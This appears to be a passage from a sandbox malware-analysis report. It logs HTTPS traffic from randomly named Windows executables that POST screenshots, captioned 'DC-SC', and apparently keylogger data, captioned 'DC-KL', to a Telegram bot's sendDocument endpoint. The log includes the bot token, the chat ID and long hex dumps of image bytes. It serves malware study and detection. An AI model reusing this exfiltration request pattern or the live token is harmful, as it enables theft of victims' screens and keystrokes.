2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:35 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:35 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:39 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49864	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:36 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 6a 59 47 6b 44 65 55 4c 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotjYGkDeUL.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:36 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:36 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:40 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49875	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:41 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 997 Connection: Keep-Alive Cache-Control: no-cache
